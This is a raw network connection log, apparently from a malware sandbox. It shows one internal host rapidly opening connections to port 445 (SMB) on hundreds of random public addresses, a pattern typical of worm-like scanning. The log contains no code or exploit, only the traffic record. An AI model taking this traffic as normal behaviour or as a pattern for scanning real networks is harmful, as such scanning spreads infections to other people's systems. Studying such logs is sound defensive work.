May 8, 2023 05:36:49.964202881 CEST	51046	445	192.168.2.6	117.36.209.97
May 8, 2023 05:36:49.964338064 CEST	51047	445	192.168.2.6	69.201.141.67
May 8, 2023 05:36:49.964504004 CEST	51048	445	192.168.2.6	89.112.216.134
May 8, 2023 05:36:49.964664936 CEST	51049	445	192.168.2.6	110.193.28.163
May 8, 2023 05:36:49.964837074 CEST	51050	445	192.168.2.6	145.161.227.124
May 8, 2023 05:36:49.965104103 CEST	51051	445	192.168.2.6	132.124.171.144
May 8, 2023 05:36:49.965339899 CEST	51052	445	192.168.2.6	187.118.209.4
May 8, 2023 05:36:49.965538979 CEST	51053	445	192.168.2.6	100.17.242.81
May 8, 2023 05:36:49.965763092 CEST	51054	445	192.168.2.6	89.235.9.129
May 8, 2023 05:36:50.014820099 CEST	51055	445	192.168.2.6	107.165.99.34
May 8, 2023 05:36:50.061784029 CEST	51056	445	192.168.2.6	107.63.215.40
May 8, 2023 05:36:50.084167957 CEST	445	51040	208.80.101.193	192.168.2.6
May 8, 2023 05:36:50.264704943 CEST	51059	445	192.168.2.6	89.251.130.85
May 8, 2023 05:36:50.592317104 CEST	51040	445	192.168.2.6	208.80.101.193
May 8, 2023 05:36:50.722917080 CEST	445	51040	208.80.101.193	192.168.2.6
May 8, 2023 05:36:51.077294111 CEST	51061	445	192.168.2.6	51.86.212.197
May 8, 2023 05:36:51.077301025 CEST	51063	445	192.168.2.6	220.240.135.66
May 8, 2023 05:36:51.077368975 CEST	51062	445	192.168.2.6	121.15.76.235
May 8, 2023 05:36:51.077493906 CEST	51065	445	192.168.2.6	43.218.26.137
May 8, 2023 05:36:51.077528954 CEST	51066	445	192.168.2.6	30.64.40.81
May 8, 2023 05:36:51.077632904 CEST	51067	445	192.168.2.6	106.160.70.37
May 8, 2023 05:36:51.077658892 CEST	51064	445	192.168.2.6	91.42.41.135
May 8, 2023 05:36:51.077759027 CEST	51068	445	192.168.2.6	17.174.251.123
May 8, 2023 05:36:51.077893972 CEST	51070	445	192.168.2.6	21.110.75.254
May 8, 2023 05:36:51.077894926 CEST	51069	445	192.168.2.6	204.199.249.65
May 8, 2023 05:36:51.077991009 CEST	51072	445	192.168.2.6	222.142.217.138
May 8, 2023 05:36:51.078105927 CEST	51073	445	192.168.2.6	177.108.95.209
May 8, 2023 05:36:51.078152895 CEST	51075	445	192.168.2.6	195.200.162.114
May 8, 2023 05:36:51.078166008 CEST	51074	445	192.168.2.6	38.138.253.189
May 8, 2023 05:36:51.078267097 CEST	51076	445	192.168.2.6	62.50.62.140
May 8, 2023 05:36:51.078309059 CEST	51077	445	192.168.2.6	214.193.88.209
May 8, 2023 05:36:51.078421116 CEST	51078	445	192.168.2.6	84.191.194.221
May 8, 2023 05:36:51.078515053 CEST	51079	445	192.168.2.6	126.43.67.137
May 8, 2023 05:36:51.078515053 CEST	51080	445	192.168.2.6	25.90.228.86
May 8, 2023 05:36:51.078610897 CEST	51081	445	192.168.2.6	39.19.202.164
May 8, 2023 05:36:51.078697920 CEST	51082	445	192.168.2.6	69.249.47.61
May 8, 2023 05:36:51.078720093 CEST	51083	445	192.168.2.6	107.165.99.35
May 8, 2023 05:36:51.124211073 CEST	51084	445	192.168.2.6	115.20.169.86
May 8, 2023 05:36:51.124761105 CEST	51085	445	192.168.2.6	101.250.17.51
May 8, 2023 05:36:51.125211000 CEST	51086	445	192.168.2.6	43.232.241.231
May 8, 2023 05:36:51.126121998 CEST	51087	445	192.168.2.6	176.188.39.35
May 8, 2023 05:36:51.126584053 CEST	51088	445	192.168.2.6	204.22.207.199
May 8, 2023 05:36:51.127527952 CEST	51089	445	192.168.2.6	53.231.248.52
May 8, 2023 05:36:51.128017902 CEST	51090	445	192.168.2.6	89.19.25.187
May 8, 2023 05:36:51.170814991 CEST	51092	445	192.168.2.6	176.213.100.210
May 8, 2023 05:36:51.177671909 CEST	445	51090	89.19.25.187	192.168.2.6
May 8, 2023 05:36:51.378567934 CEST	51094	445	192.168.2.6	115.67.18.111
May 8, 2023 05:36:51.873714924 CEST	51090	445	192.168.2.6	89.19.25.187
May 8, 2023 05:36:51.923763037 CEST	445	51090	89.19.25.187	192.168.2.6
May 8, 2023 05:36:52.139599085 CEST	51097	445	192.168.2.6	107.165.99.36
May 8, 2023 05:36:52.187021971 CEST	51098	445	192.168.2.6	10.79.29.67
May 8, 2023 05:36:52.187225103 CEST	51099	445	192.168.2.6	165.16.121.134
May 8, 2023 05:36:52.187371016 CEST	51100	445	192.168.2.6	8.233.19.26
May 8, 2023 05:36:52.187551022 CEST	51101	445	192.168.2.6	126.52.97.90
May 8, 2023 05:36:52.187742949 CEST	51102	445	192.168.2.6	76.174.13.58
May 8, 2023 05:36:52.187910080 CEST	51103	445	192.168.2.6	65.100.178.221
May 8, 2023 05:36:52.187995911 CEST	51104	445	192.168.2.6	199.32.5.126
May 8, 2023 05:36:52.188167095 CEST	51105	445	192.168.2.6	11.216.168.185
May 8, 2023 05:36:52.188268900 CEST	51106	445	192.168.2.6	38.32.77.197
May 8, 2023 05:36:52.188426018 CEST	51107	445	192.168.2.6	98.201.59.2
May 8, 2023 05:36:52.188541889 CEST	51108	445	192.168.2.6	9.115.88.21
May 8, 2023 05:36:52.188707113 CEST	51109	445	192.168.2.6	50.238.161.187
May 8, 2023 05:36:52.188812017 CEST	51110	445	192.168.2.6	53.3.78.211
May 8, 2023 05:36:52.188971996 CEST	51111	445	192.168.2.6	23.40.155.210
May 8, 2023 05:36:52.189071894 CEST	51112	445	192.168.2.6	160.202.212.139
May 8, 2023 05:36:52.189240932 CEST	51113	445	192.168.2.6	85.80.139.73
May 8, 2023 05:36:52.189348936 CEST	51114	445	192.168.2.6	48.199.44.28
May 8, 2023 05:36:52.189513922 CEST	51115	445	192.168.2.6	99.103.164.97
May 8, 2023 05:36:52.189647913 CEST	51116	445	192.168.2.6	55.80.26.191
May 8, 2023 05:36:52.190036058 CEST	51117	445	192.168.2.6	96.221.232.21
May 8, 2023 05:36:52.190087080 CEST	51118	445	192.168.2.6	214.165.103.218
May 8, 2023 05:36:52.190171957 CEST	51119	445	192.168.2.6	208.169.43.125
May 8, 2023 05:36:52.267585993 CEST	51120	445	192.168.2.6	20.163.213.211
May 8, 2023 05:36:52.267927885 CEST	51121	445	192.168.2.6	221.18.86.107
May 8, 2023 05:36:52.268121004 CEST	51122	445	192.168.2.6	179.226.80.92
May 8, 2023 05:36:52.268157959 CEST	51123	445	192.168.2.6	19.105.205.16
May 8, 2023 05:36:52.268214941 CEST	51124	445	192.168.2.6	74.223.128.79
May 8, 2023 05:36:52.268285990 CEST	51125	445	192.168.2.6	13.154.43.249
May 8, 2023 05:36:52.268352985 CEST	51126	445	192.168.2.6	21.138.238.167
May 8, 2023 05:36:52.280298948 CEST	51128	445	192.168.2.6	158.231.98.142
May 8, 2023 05:36:52.499123096 CEST	51130	445	192.168.2.6	164.189.80.231
May 8, 2023 05:36:53.218451977 CEST	51133	445	192.168.2.6	107.165.99.37
May 8, 2023 05:36:53.296024084 CEST	51134	445	192.168.2.6	190.24.28.184
May 8, 2023 05:36:53.296212912 CEST	51135	445	192.168.2.6	98.130.69.40
May 8, 2023 05:36:53.296225071 CEST	51136	445	192.168.2.6	217.220.113.60
May 8, 2023 05:36:53.296392918 CEST	51137	445	192.168.2.6	46.5.58.40
May 8, 2023 05:36:53.296472073 CEST	51138	445	192.168.2.6	133.162.151.233
May 8, 2023 05:36:53.296654940 CEST	51140	445	192.168.2.6	72.49.236.204
May 8, 2023 05:36:53.296830893 CEST	51139	445	192.168.2.6	132.149.49.132
May 8, 2023 05:36:53.296921968 CEST	51141	445	192.168.2.6	88.178.212.112
May 8, 2023 05:36:53.297091961 CEST	51142	445	192.168.2.6	170.171.190.86
May 8, 2023 05:36:53.297183990 CEST	51143	445	192.168.2.6	71.3.202.201
May 8, 2023 05:36:53.297291040 CEST	51144	445	192.168.2.6	131.118.205.133
May 8, 2023 05:36:53.297439098 CEST	51145	445	192.168.2.6	119.106.88.101
May 8, 2023 05:36:53.297473907 CEST	51146	445	192.168.2.6	11.14.3.104
May 8, 2023 05:36:53.297677040 CEST	51148	445	192.168.2.6	44.133.198.14
May 8, 2023 05:36:53.297713995 CEST	51147	445	192.168.2.6	184.134.125.88
May 8, 2023 05:36:53.297936916 CEST	51149	445	192.168.2.6	47.204.103.2
May 8, 2023 05:36:53.298038006 CEST	51150	445	192.168.2.6	174.9.188.57
May 8, 2023 05:36:53.298134089 CEST	51151	445	192.168.2.6	204.37.62.145
May 8, 2023 05:36:53.298178911 CEST	51152	445	192.168.2.6	178.148.107.111
May 8, 2023 05:36:53.298326015 CEST	51153	445	192.168.2.6	23.40.139.237
May 8, 2023 05:36:53.298377991 CEST	51154	445	192.168.2.6	63.175.134.182
May 8, 2023 05:36:53.298525095 CEST	51155	445	192.168.2.6	158.109.54.66
May 8, 2023 05:36:53.376111031 CEST	51157	445	192.168.2.6	148.149.88.84
May 8, 2023 05:36:53.376199007 CEST	51156	445	192.168.2.6	138.204.252.186
May 8, 2023 05:36:53.376202106 CEST	51159	445	192.168.2.6	191.105.27.51
May 8, 2023 05:36:53.376220942 CEST	51158	445	192.168.2.6	10.211.176.28
May 8, 2023 05:36:53.376240015 CEST	51160	445	192.168.2.6	29.177.195.61
May 8, 2023 05:36:53.376353025 CEST	51161	445	192.168.2.6	158.143.40.226
May 8, 2023 05:36:53.376482964 CEST	51162	445	192.168.2.6	140.133.101.107
May 8, 2023 05:36:53.390544891 CEST	51164	445	192.168.2.6	89.236.143.141
May 8, 2023 05:36:53.581871986 CEST	445	51134	190.24.28.184	192.168.2.6
May 8, 2023 05:36:53.624247074 CEST	51166	445	192.168.2.6	197.253.112.14
May 8, 2023 05:36:54.170766115 CEST	51134	445	192.168.2.6	190.24.28.184
May 8, 2023 05:36:54.297934055 CEST	51169	445	192.168.2.6	107.165.99.38
May 8, 2023 05:36:54.406037092 CEST	51171	445	192.168.2.6	117.21.119.154
May 8, 2023 05:36:54.406162024 CEST	51172	445	192.168.2.6	155.114.228.142
May 8, 2023 05:36:54.406265974 CEST	51173	445	192.168.2.6	126.7.210.182
May 8, 2023 05:36:54.406378984 CEST	51174	445	192.168.2.6	117.158.19.130
May 8, 2023 05:36:54.406487942 CEST	51175	445	192.168.2.6	179.106.15.191
May 8, 2023 05:36:54.406614065 CEST	51176	445	192.168.2.6	202.159.55.243
May 8, 2023 05:36:54.406897068 CEST	51177	445	192.168.2.6	69.18.30.135
May 8, 2023 05:36:54.406960964 CEST	51178	445	192.168.2.6	44.147.182.162
May 8, 2023 05:36:54.407075882 CEST	51179	445	192.168.2.6	153.225.241.208
May 8, 2023 05:36:54.407155037 CEST	51180	445	192.168.2.6	122.85.88.177
May 8, 2023 05:36:54.407310009 CEST	51181	445	192.168.2.6	174.70.165.206
May 8, 2023 05:36:54.407461882 CEST	51182	445	192.168.2.6	82.219.128.188
May 8, 2023 05:36:54.407620907 CEST	51183	445	192.168.2.6	49.48.242.174
May 8, 2023 05:36:54.407783031 CEST	51184	445	192.168.2.6	68.249.228.231
May 8, 2023 05:36:54.407936096 CEST	51185	445	192.168.2.6	203.99.253.125
May 8, 2023 05:36:54.408051968 CEST	51186	445	192.168.2.6	56.108.50.69
May 8, 2023 05:36:54.408195019 CEST	51187	445	192.168.2.6	185.249.7.32
May 8, 2023 05:36:54.408360004 CEST	51188	445	192.168.2.6	28.98.58.154
May 8, 2023 05:36:54.408489943 CEST	51189	445	192.168.2.6	106.106.7.56
May 8, 2023 05:36:54.408617020 CEST	51190	445	192.168.2.6	36.24.229.16
May 8, 2023 05:36:54.408745050 CEST	51191	445	192.168.2.6	175.66.118.5
May 8, 2023 05:36:54.409007072 CEST	51192	445	192.168.2.6	51.83.120.235
May 8, 2023 05:36:54.456435919 CEST	445	51134	190.24.28.184	192.168.2.6
May 8, 2023 05:36:54.499785900 CEST	51193	445	192.168.2.6	31.213.184.245
May 8, 2023 05:36:54.515187979 CEST	51195	445	192.168.2.6	74.171.53.15
May 8, 2023 05:36:54.515845060 CEST	51196	445	192.168.2.6	199.8.235.94
May 8, 2023 05:36:54.516557932 CEST	51197	445	192.168.2.6	185.103.210.51
May 8, 2023 05:36:54.517260075 CEST	51198	445	192.168.2.6	85.217.138.191
May 8, 2023 05:36:54.517997980 CEST	51199	445	192.168.2.6	83.152.7.196
May 8, 2023 05:36:54.518697023 CEST	51200	445	192.168.2.6	188.125.106.147
May 8, 2023 05:36:54.519388914 CEST	51201	445	192.168.2.6	131.39.8.24
May 8, 2023 05:36:54.614892960 CEST	445	51185	203.99.253.125	192.168.2.6
May 8, 2023 05:36:54.749702930 CEST	51203	445	192.168.2.6	148.215.240.191
May 8, 2023 05:36:55.124015093 CEST	51185	445	192.168.2.6	203.99.253.125
May 8, 2023 05:36:55.331166983 CEST	445	51185	203.99.253.125	192.168.2.6
May 8, 2023 05:36:55.374260902 CEST	51206	445	192.168.2.6	107.165.99.39
May 8, 2023 05:36:55.530828953 CEST	51208	445	192.168.2.6	185.242.243.156
May 8, 2023 05:36:55.530849934 CEST	51209	445	192.168.2.6	206.61.202.136
May 8, 2023 05:36:55.531021118 CEST	51210	445	192.168.2.6	159.28.212.19
May 8, 2023 05:36:55.531199932 CEST	51211	445	192.168.2.6	182.2.76.62
May 8, 2023 05:36:55.531349897 CEST	51212	445	192.168.2.6	200.235.213.123
May 8, 2023 05:36:55.531536102 CEST	51213	445	192.168.2.6	144.136.180.252
May 8, 2023 05:36:55.531691074 CEST	51214	445	192.168.2.6	204.177.212.152
May 8, 2023 05:36:55.531861067 CEST	51215	445	192.168.2.6	78.156.179.131
May 8, 2023 05:36:55.532021999 CEST	51216	445	192.168.2.6	74.51.185.24
May 8, 2023 05:36:55.532258034 CEST	51217	445	192.168.2.6	80.189.17.200
May 8, 2023 05:36:55.532320023 CEST	51218	445	192.168.2.6	212.2.50.158
May 8, 2023 05:36:55.532490969 CEST	51219	445	192.168.2.6	162.121.49.218
May 8, 2023 05:36:55.532613993 CEST	51220	445	192.168.2.6	4.107.248.24
May 8, 2023 05:36:55.532779932 CEST	51221	445	192.168.2.6	144.163.130.58
May 8, 2023 05:36:55.532910109 CEST	51222	445	192.168.2.6	189.1.93.249
May 8, 2023 05:36:55.534151077 CEST	51223	445	192.168.2.6	6.78.103.79
May 8, 2023 05:36:55.534348965 CEST	51224	445	192.168.2.6	101.136.214.56
May 8, 2023 05:36:55.534478903 CEST	51225	445	192.168.2.6	157.103.75.167
May 8, 2023 05:36:55.542438984 CEST	51227	445	192.168.2.6	153.160.157.59
May 8, 2023 05:36:55.542742014 CEST	51228	445	192.168.2.6	211.171.253.194
May 8, 2023 05:36:55.543073893 CEST	51229	445	192.168.2.6	155.11.161.112
May 8, 2023 05:36:55.624684095 CEST	51230	445	192.168.2.6	114.254.223.49
May 8, 2023 05:36:55.625164032 CEST	51231	445	192.168.2.6	97.205.119.15
May 8, 2023 05:36:55.625737906 CEST	51232	445	192.168.2.6	202.191.73.190
May 8, 2023 05:36:55.627188921 CEST	51233	445	192.168.2.6	191.160.48.47
May 8, 2023 05:36:55.627695084 CEST	51234	445	192.168.2.6	72.148.74.225
May 8, 2023 05:36:55.636820078 CEST	51235	445	192.168.2.6	185.166.241.202
May 8, 2023 05:36:55.637240887 CEST	51237	445	192.168.2.6	64.115.157.216
May 8, 2023 05:36:55.637392998 CEST	51238	445	192.168.2.6	121.177.160.184
May 8, 2023 05:36:55.861531019 CEST	51240	445	192.168.2.6	114.128.119.173
May 8, 2023 05:36:56.437021971 CEST	51244	445	192.168.2.6	107.165.99.40
May 8, 2023 05:36:56.640355110 CEST	51246	445	192.168.2.6	24.231.211.173
May 8, 2023 05:36:56.640360117 CEST	51247	445	192.168.2.6	66.153.6.223
May 8, 2023 05:36:56.640461922 CEST	51248	445	192.168.2.6	138.6.185.176
May 8, 2023 05:36:56.640702009 CEST	51249	445	192.168.2.6	158.253.25.108
May 8, 2023 05:36:56.640907049 CEST	51250	445	192.168.2.6	31.199.124.147
May 8, 2023 05:36:56.641071081 CEST	51251	445	192.168.2.6	5.172.47.65
May 8, 2023 05:36:56.641253948 CEST	51252	445	192.168.2.6	208.104.187.171
May 8, 2023 05:36:56.641475916 CEST	51253	445	192.168.2.6	30.171.247.203
May 8, 2023 05:36:56.641585112 CEST	51254	445	192.168.2.6	180.247.223.195
May 8, 2023 05:36:56.641719103 CEST	51255	445	192.168.2.6	193.208.55.224
May 8, 2023 05:36:56.641882896 CEST	51256	445	192.168.2.6	92.47.189.77
May 8, 2023 05:36:56.642049074 CEST	51257	445	192.168.2.6	116.18.155.223
May 8, 2023 05:36:56.642163992 CEST	51258	445	192.168.2.6	34.164.221.191
May 8, 2023 05:36:56.642348051 CEST	51259	445	192.168.2.6	98.91.81.129
May 8, 2023 05:36:56.642505884 CEST	51260	445	192.168.2.6	16.118.206.112
May 8, 2023 05:36:56.642673969 CEST	51261	445	192.168.2.6	91.230.233.32
May 8, 2023 05:36:56.642854929 CEST	51262	445	192.168.2.6	177.227.170.63
May 8, 2023 05:36:56.643147945 CEST	51263	445	192.168.2.6	133.254.132.177
May 8, 2023 05:36:56.643326998 CEST	51264	445	192.168.2.6	155.113.207.252
May 8, 2023 05:36:56.643511057 CEST	51265	445	192.168.2.6	36.196.192.110
May 8, 2023 05:36:56.643802881 CEST	51266	445	192.168.2.6	119.115.56.40
May 8, 2023 05:36:56.643920898 CEST	51267	445	192.168.2.6	180.196.148.246
May 8, 2023 05:36:56.734193087 CEST	51268	445	192.168.2.6	223.119.75.4
May 8, 2023 05:36:56.770062923 CEST	51271	445	192.168.2.6	189.177.165.129
May 8, 2023 05:36:56.770087957 CEST	51270	445	192.168.2.6	67.115.154.169
May 8, 2023 05:36:56.770592928 CEST	51272	445	192.168.2.6	217.177.189.26
May 8, 2023 05:36:56.770644903 CEST	51273	445	192.168.2.6	191.14.155.186
May 8, 2023 05:36:56.770772934 CEST	51274	445	192.168.2.6	217.138.207.91
May 8, 2023 05:36:56.770905018 CEST	51276	445	192.168.2.6	205.216.57.74
May 8, 2023 05:36:56.770944118 CEST	51275	445	192.168.2.6	204.227.105.244
May 8, 2023 05:36:56.838923931 CEST	445	51254	180.247.223.195	192.168.2.6
May 8, 2023 05:36:56.983706951 CEST	51277	445	192.168.2.6	156.204.175.55
May 8, 2023 05:36:57.074402094 CEST	445	51273	191.14.155.186	192.168.2.6
May 8, 2023 05:36:57.077330112 CEST	445	51277	156.204.175.55	192.168.2.6
May 8, 2023 05:36:57.342983961 CEST	51254	445	192.168.2.6	180.247.223.195
May 8, 2023 05:36:57.500212908 CEST	51282	445	192.168.2.6	107.165.99.41
May 8, 2023 05:36:57.539877892 CEST	445	51254	180.247.223.195	192.168.2.6
May 8, 2023 05:36:57.577353954 CEST	51273	445	192.168.2.6	191.14.155.186
May 8, 2023 05:36:57.593061924 CEST	51277	445	192.168.2.6	156.204.175.55
May 8, 2023 05:36:57.687330961 CEST	445	51277	156.204.175.55	192.168.2.6
May 8, 2023 05:36:57.767119884 CEST	51284	445	192.168.2.6	19.19.252.238
May 8, 2023 05:36:57.767539024 CEST	51285	445	192.168.2.6	169.196.111.51
May 8, 2023 05:36:57.768065929 CEST	51286	445	192.168.2.6	75.55.173.186
May 8, 2023 05:36:57.768209934 CEST	51287	445	192.168.2.6	19.34.129.129
May 8, 2023 05:36:57.768824100 CEST	51288	445	192.168.2.6	23.139.116.92
May 8, 2023 05:36:57.768938065 CEST	51289	445	192.168.2.6	74.11.121.217
May 8, 2023 05:36:57.769088030 CEST	51291	445	192.168.2.6	126.253.34.113
May 8, 2023 05:36:57.769145012 CEST	51290	445	192.168.2.6	155.91.137.97
May 8, 2023 05:36:57.769310951 CEST	51292	445	192.168.2.6	93.23.92.216
May 8, 2023 05:36:57.769387007 CEST	51294	445	192.168.2.6	134.104.1.102
May 8, 2023 05:36:57.769484997 CEST	51293	445	192.168.2.6	165.73.51.132
May 8, 2023 05:36:57.769604921 CEST	51296	445	192.168.2.6	205.211.106.243
May 8, 2023 05:36:57.769604921 CEST	51295	445	192.168.2.6	196.56.18.205
May 8, 2023 05:36:57.769731998 CEST	51298	445	192.168.2.6	43.83.111.146
May 8, 2023 05:36:57.769784927 CEST	51297	445	192.168.2.6	42.238.238.232
May 8, 2023 05:36:57.769877911 CEST	51299	445	192.168.2.6	5.57.168.75
May 8, 2023 05:36:57.770016909 CEST	51300	445	192.168.2.6	194.185.247.47
May 8, 2023 05:36:57.770133018 CEST	51302	445	192.168.2.6	216.191.115.175
May 8, 2023 05:36:57.770134926 CEST	51301	445	192.168.2.6	84.35.211.32
May 8, 2023 05:36:57.770237923 CEST	51303	445	192.168.2.6	116.139.36.17
May 8, 2023 05:36:57.770347118 CEST	51304	445	192.168.2.6	172.170.209.9
May 8, 2023 05:36:57.770440102 CEST	51305	445	192.168.2.6	132.107.202.199
May 8, 2023 05:36:57.843314886 CEST	51306	445	192.168.2.6	21.164.96.213
May 8, 2023 05:36:57.874320984 CEST	445	51273	191.14.155.186	192.168.2.6
May 8, 2023 05:36:57.891192913 CEST	51308	445	192.168.2.6	85.236.163.193
May 8, 2023 05:36:57.891578913 CEST	51309	445	192.168.2.6	141.160.230.66
May 8, 2023 05:36:57.893552065 CEST	51310	445	192.168.2.6	129.42.100.156
May 8, 2023 05:36:57.893883944 CEST	51311	445	192.168.2.6	101.78.150.191
May 8, 2023 05:36:57.893953085 CEST	51312	445	192.168.2.6	97.123.159.224
May 8, 2023 05:36:57.894022942 CEST	51313	445	192.168.2.6	155.42.44.230
May 8, 2023 05:36:57.894138098 CEST	51314	445	192.168.2.6	200.200.105.190
May 8, 2023 05:36:58.097913027 CEST	51316	445	192.168.2.6	93.182.37.141
May 8, 2023 05:36:58.577980995 CEST	51320	445	192.168.2.6	107.165.99.42
May 8, 2023 05:36:58.874958992 CEST	51323	445	192.168.2.6	42.15.6.16
May 8, 2023 05:36:58.874969959 CEST	51324	445	192.168.2.6	33.80.40.69
May 8, 2023 05:36:58.875138044 CEST	51325	445	192.168.2.6	93.100.41.64
May 8, 2023 05:36:58.875334024 CEST	51326	445	192.168.2.6	116.119.125.218
May 8, 2023 05:36:58.875488997 CEST	51327	445	192.168.2.6	70.251.89.97
May 8, 2023 05:36:58.875605106 CEST	51328	445	192.168.2.6	54.113.91.218
May 8, 2023 05:36:58.875750065 CEST	51329	445	192.168.2.6	63.39.183.227
May 8, 2023 05:36:58.875927925 CEST	51330	445	192.168.2.6	76.191.55.80
May 8, 2023 05:36:58.876117945 CEST	51331	445	192.168.2.6	169.43.245.251
May 8, 2023 05:36:58.876250029 CEST	51332	445	192.168.2.6	1.52.223.23
May 8, 2023 05:36:58.876388073 CEST	51333	445	192.168.2.6	219.36.28.48
May 8, 2023 05:36:58.876527071 CEST	51334	445	192.168.2.6	78.16.239.26
May 8, 2023 05:36:58.876677990 CEST	51335	445	192.168.2.6	77.154.159.193
May 8, 2023 05:36:58.876806021 CEST	51336	445	192.168.2.6	5.46.137.224
May 8, 2023 05:36:58.877011061 CEST	51337	445	192.168.2.6	151.195.30.206
May 8, 2023 05:36:58.877079964 CEST	51338	445	192.168.2.6	143.39.133.242
May 8, 2023 05:36:58.877244949 CEST	51339	445	192.168.2.6	92.207.38.134
May 8, 2023 05:36:58.877381086 CEST	51340	445	192.168.2.6	117.78.205.50
May 8, 2023 05:36:58.877528906 CEST	51341	445	192.168.2.6	183.167.76.233
May 8, 2023 05:36:58.877675056 CEST	51342	445	192.168.2.6	192.246.214.62
May 8, 2023 05:36:58.877846956 CEST	51343	445	192.168.2.6	47.61.6.224
May 8, 2023 05:36:58.877995968 CEST	51344	445	192.168.2.6	182.124.58.239
May 8, 2023 05:36:58.952806950 CEST	51345	445	192.168.2.6	7.128.119.206
May 8, 2023 05:36:59.015758038 CEST	51347	445	192.168.2.6	186.78.10.86
May 8, 2023 05:36:59.016341925 CEST	51348	445	192.168.2.6	56.245.54.76
May 8, 2023 05:36:59.016990900 CEST	51349	445	192.168.2.6	165.114.139.48
May 8, 2023 05:36:59.017662048 CEST	51350	445	192.168.2.6	66.155.180.188
May 8, 2023 05:36:59.018291950 CEST	51351	445	192.168.2.6	57.227.139.175
May 8, 2023 05:36:59.018944025 CEST	51352	445	192.168.2.6	171.164.2.224
May 8, 2023 05:36:59.019701004 CEST	51353	445	192.168.2.6	10.228.229.110
May 8, 2023 05:36:59.218626976 CEST	51355	445	192.168.2.6	145.1.173.121
May 8, 2023 05:36:59.640317917 CEST	51359	445	192.168.2.6	107.165.99.43
May 8, 2023 05:36:59.984317064 CEST	51363	445	192.168.2.6	92.192.231.22
May 8, 2023 05:36:59.984469891 CEST	51364	445	192.168.2.6	161.159.148.52
May 8, 2023 05:36:59.984755039 CEST	51365	445	192.168.2.6	65.14.211.57
May 8, 2023 05:36:59.984875917 CEST	51366	445	192.168.2.6	8.97.196.113
May 8, 2023 05:36:59.985126972 CEST	51367	445	192.168.2.6	155.170.78.18
May 8, 2023 05:36:59.985248089 CEST	51368	445	192.168.2.6	5.253.139.227
May 8, 2023 05:36:59.985483885 CEST	51369	445	192.168.2.6	149.176.152.192
May 8, 2023 05:36:59.985605955 CEST	51370	445	192.168.2.6	171.165.102.23
May 8, 2023 05:36:59.985829115 CEST	51371	445	192.168.2.6	25.55.224.101
May 8, 2023 05:36:59.985960007 CEST	51372	445	192.168.2.6	151.60.6.95
May 8, 2023 05:36:59.986119986 CEST	51373	445	192.168.2.6	110.185.100.174
May 8, 2023 05:36:59.986239910 CEST	51374	445	192.168.2.6	46.40.63.47
May 8, 2023 05:36:59.986423969 CEST	51375	445	192.168.2.6	36.219.187.50
May 8, 2023 05:36:59.986530066 CEST	51376	445	192.168.2.6	64.234.227.86
May 8, 2023 05:36:59.986779928 CEST	51377	445	192.168.2.6	143.241.106.69
May 8, 2023 05:36:59.987019062 CEST	51378	445	192.168.2.6	144.196.109.210
May 8, 2023 05:36:59.987250090 CEST	51379	445	192.168.2.6	19.25.202.84
May 8, 2023 05:36:59.987513065 CEST	51380	445	192.168.2.6	62.67.232.117
May 8, 2023 05:36:59.987703085 CEST	51381	445	192.168.2.6	88.242.91.219
May 8, 2023 05:36:59.987889051 CEST	51382	445	192.168.2.6	51.218.116.253
May 8, 2023 05:36:59.988179922 CEST	51383	445	192.168.2.6	122.133.99.84
May 8, 2023 05:36:59.988370895 CEST	51384	445	192.168.2.6	93.227.15.210
May 8, 2023 05:37:00.077958107 CEST	51385	445	192.168.2.6	85.243.188.223
May 8, 2023 05:37:00.141606092 CEST	51387	445	192.168.2.6	17.44.44.184
May 8, 2023 05:37:00.141982079 CEST	51388	445	192.168.2.6	70.249.176.131
May 8, 2023 05:37:00.142716885 CEST	51389	445	192.168.2.6	48.198.16.79
May 8, 2023 05:37:00.144705057 CEST	51390	445	192.168.2.6	180.155.247.25
May 8, 2023 05:37:00.145243883 CEST	51391	445	192.168.2.6	178.5.115.244
May 8, 2023 05:37:00.145988941 CEST	51392	445	192.168.2.6	57.225.108.113
May 8, 2023 05:37:00.146687031 CEST	51393	445	192.168.2.6	212.6.51.228
May 8, 2023 05:37:00.328248024 CEST	51395	445	192.168.2.6	165.65.241.63
May 8, 2023 05:37:00.702935934 CEST	51399	445	192.168.2.6	107.165.99.44
May 8, 2023 05:37:01.093801975 CEST	51404	445	192.168.2.6	53.227.101.186
May 8, 2023 05:37:01.093828917 CEST	51403	445	192.168.2.6	107.236.87.80
May 8, 2023 05:37:01.093919992 CEST	51405	445	192.168.2.6	185.76.162.181
May 8, 2023 05:37:01.094018936 CEST	51406	445	192.168.2.6	77.144.124.228
May 8, 2023 05:37:01.094264030 CEST	51408	445	192.168.2.6	161.169.192.124
May 8, 2023 05:37:01.094269037 CEST	51407	445	192.168.2.6	87.205.190.169
May 8, 2023 05:37:01.094362974 CEST	51409	445	192.168.2.6	76.11.38.102
May 8, 2023 05:37:01.094506025 CEST	51410	445	192.168.2.6	123.189.230.98
May 8, 2023 05:37:01.094608068 CEST	51411	445	192.168.2.6	94.81.219.191
May 8, 2023 05:37:01.094753981 CEST	51412	445	192.168.2.6	63.55.158.59
May 8, 2023 05:37:01.094840050 CEST	51413	445	192.168.2.6	171.70.132.162
May 8, 2023 05:37:01.094980955 CEST	51414	445	192.168.2.6	122.209.204.230
May 8, 2023 05:37:01.095096111 CEST	51415	445	192.168.2.6	73.97.34.80
May 8, 2023 05:37:01.095244884 CEST	51416	445	192.168.2.6	10.128.33.88
May 8, 2023 05:37:01.095350981 CEST	51417	445	192.168.2.6	164.17.171.158
May 8, 2023 05:37:01.095487118 CEST	51418	445	192.168.2.6	181.233.15.251
May 8, 2023 05:37:01.095583916 CEST	51419	445	192.168.2.6	82.3.57.243
May 8, 2023 05:37:01.095736027 CEST	51420	445	192.168.2.6	180.207.79.87
May 8, 2023 05:37:01.095823050 CEST	51421	445	192.168.2.6	133.76.226.40
May 8, 2023 05:37:01.095958948 CEST	51422	445	192.168.2.6	99.92.54.156
May 8, 2023 05:37:01.096046925 CEST	51423	445	192.168.2.6	89.12.214.102
May 8, 2023 05:37:01.096203089 CEST	51424	445	192.168.2.6	194.89.59.212
May 8, 2023 05:37:01.187686920 CEST	51425	445	192.168.2.6	134.178.193.208
May 8, 2023 05:37:01.267263889 CEST	51427	445	192.168.2.6	217.125.106.80
May 8, 2023 05:37:01.269005060 CEST	51428	445	192.168.2.6	209.213.111.247
May 8, 2023 05:37:01.274697065 CEST	51429	445	192.168.2.6	204.38.36.23
May 8, 2023 05:37:01.275027990 CEST	51430	445	192.168.2.6	25.240.172.199
May 8, 2023 05:37:01.275105953 CEST	51431	445	192.168.2.6	73.49.125.197
